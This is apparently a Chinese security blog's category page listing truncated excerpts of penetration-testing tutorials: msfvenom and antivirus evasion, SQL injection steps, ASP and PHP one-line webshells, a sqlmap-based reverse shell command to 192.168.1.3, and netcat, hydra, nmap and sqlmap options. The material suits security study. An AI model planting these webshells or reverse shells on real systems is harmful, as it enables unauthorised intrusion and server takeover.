漏洞挖掘
讲解各种漏洞类型和工具的使用,以及一些漏洞的挖掘技巧
tomyyyyy
这个作者很懒,什么都没留下…
展开
-
msf的实战使用——msfvenom
msf的实战使用——msfvenom文章目录msf的实战使用——msfvenommsfvenom命令的参数常用命令木马免杀姿势1:Py2exe生成exe姿势2:PyInstaller生成exe姿势3:编译c源码msfvenom命令的参数Options: -l, --list <type> # 列出所有可用的项目,其中值可以被设置为 payloads, encoders, nops, platforms, archs, encrypt,原创 2020-05-11 21:56:01 · 2886 阅读 · 1 评论 -
文件上传
我们在做渗透测试的时候会经常遇到存在命令执行的Windows服务器,而且不能上传shell,唯一的入口就是命令执行,这种情况下,我们需要向服务器上传一个大一点的工具,如何实现,这就是本文章主要的内容。利用http协议下载文件利用vbs下载将下面的代码保存为test.vbs执行如下语句:cscript test.vbs利用powershell下载将如下代码保存为test.ps1$...原创 2019-07-21 16:20:30 · 230 阅读 · 0 评论 -
注入总结
注入总结参考链接MYSQL有时使用union注入时,会出现一些乱码,如下解决convert(@@version using latin1)unhex(hex(@@version))注释符井号(#) 双横线 (-- )后面要加一个空格 /**/ 局部注释 %00 直接截断字符串 `反引号关键字转义符波浪线那个键,的那个小点符号- -!insert into a...原创 2019-07-21 16:19:30 · 284 阅读 · 0 评论 -
一句话木马
一句话木马asp<%execute(request("kxc"))%><%eval request ("pass")%><%eval request(chr(35))%><%executerequest("YouPass")%><%eval(request(“1″)):response.end%>php<...原创 2019-07-21 16:16:45 · 514 阅读 · 0 评论 -
获得shell的几种姿势
windows提权1.通过sqlmap连接mysql获取shell(1)直接连接数据库sqlmap.py -d “mysql://root:123456@127.0.0.1:3306/mysql”–os-shell(2)通过选择32位或者64位操作系统,获取webshell,执行bash -i >& /dev/tcp/192.168.1.3/80800>&1...原创 2019-07-13 20:34:02 · 1007 阅读 · 0 评论 -
渗透过程
第一次拿下服务器信息收集1.IP信息17CE看是否存在cdn存在的话,查找真实ip从国外去访问,查看ip信息去掉www,然后查看ip信息2.旁站信息webscan.cc站长之家3.C段信息webscan.cc站长之家4.子域名信息layer子域名挖掘机subdomain5.端口信息nmapportscan6.网站目录信息...原创 2019-07-12 21:35:28 · 210 阅读 · 0 评论 -
windows服务参考
dll文件aaclient.dll 何时何地都可以访问客户端accessibilitycpl.dll 轻松访问控制面板acledit.dll 访问控制列表编辑器aclui.dll 安全描述符编辑器acppage.dll 兼容性选项卡外壳扩展库ActionCenter.dll 操作中心ActionCenterCPL.dll 操作中心控制面板activeds.dll AD 路由器DLL...原创 2019-06-29 20:30:37 · 952 阅读 · 0 评论 -
cmd命令
运行参考可以通过cmd /c 命令 和 cmd /k 命令的方式来直接运行命令注:/c表示执行完命令后关闭cmd窗口;/k表示执行完命令后保留cmd窗口services.msc—本地服务设置cleanmgr——-垃圾整理net start [服务名] 启动一个服务 net stop [服务名] 停用一个服务slmgr.vbs -dlv 查看激活信息slmgr.vbs -dli列出...原创 2019-06-29 20:29:06 · 230 阅读 · 0 评论 -
注入(一)
eg:例子第一步,判断是否存在sql注入漏洞构造 ?id=1 and 1=1 ,回车页面返回正常构造 ?id=1 and 1=2 ,回车页面不正常,初步判断这里 可能 存在一个注入漏洞第二步:判断字段数构造 ?id=1 and 1=1 order by 1 回车页面正常构造 ?id=1 and 1=1 order by 2 回车页面正常构造 ?id=1 and 1=1 o...原创 2019-06-28 19:55:32 · 276 阅读 · 0 评论 -
netcat的使用
1,端口扫描端口扫描经常被系统管理员和黑客用来发现在一些机器上开放的端口,帮助他们识别系统中的漏洞。$nc -z -v -n 172.31.100.7 21-25可以运行在TCP或者UDP模式,默认是TCP,-u参数调整为udp.z 参数告诉netcat使用0 IO,连接成功后立即关闭连接, 不进行数据交换(谢谢@jxing 指点)v 参数指使用冗余选项(译者注:即详细输出)n 参数...原创 2019-06-27 09:59:11 · 188 阅读 · 0 评论 -
hydra使用
参数详解-R继续从上一次进度接着破解-S大写,采用SSL链接-s 小写,可通过这个参数指定非默认端口-l 指定破解的用户,对特定用户破解-L 指定用户名字典-p 小写,指定密码破解,少用,一般是采用密码字典-P 大写,指定密码字典-e 可选选项,n:空密码试探,s:使用指定用户和密码试探-C 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数-M 指...原创 2019-06-26 21:39:00 · 383 阅读 · 0 评论 -
nmap的使用
参数auth: 负责处理鉴权证书(绕开鉴权)的脚本broadcast: 在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服务brute: 提供暴力破解方式,针对常见的应用如http/snmp等default: 使用-sC或-A选项扫描时候默认的脚本,提供基本脚本扫描能力discovery: 对网络进行更多的信息,如SMB枚举、SNMP查询等dos: 用于进行拒...原创 2019-06-21 18:09:00 · 162 阅读 · 0 评论 -
sqlmap的使用
查找注入点 参数-u URL, --url=URL 目标为 URL (例如. “http://www.site.com/vuln.php?id=1”)-g GOOGLEDORK 将谷歌dork的结果作为目标url请求:这些选项可用于指定如何连接到目标URL–data=DATA 数据字符串通过POST发送–cookie=COOKIE HT...原创 2019-06-21 17:59:07 · 427 阅读 · 0 评论